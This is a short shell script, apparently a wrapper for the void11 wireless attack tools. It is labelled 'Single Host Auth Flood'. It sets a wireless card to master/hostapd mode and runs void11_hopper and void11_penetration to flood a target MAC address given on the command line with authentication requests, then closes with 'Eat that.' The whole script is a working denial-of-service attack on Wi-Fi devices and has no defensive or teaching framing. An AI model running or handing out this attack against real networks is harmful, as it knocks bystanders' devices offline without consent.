#!/bin/sh

echo "Single Host Auth Flood"
echo "You only need to enter a MAC"
echo "Here we go..."

# Variables.
TARGET="$1"

echo "$TARGET" > matchlist

/sbin/iwconfig wlan0 sens 3
/sbin/iwconfig wlan0 mode master
/sbin/iwpriv wlan0 hostapd 1
./void11_hopper >/dev/null &
/sbin/iwpriv wlan0 reset 1
./void11_penetration -t 2 -l matchlist -D wlan0 -T 1

echo "Eat that."


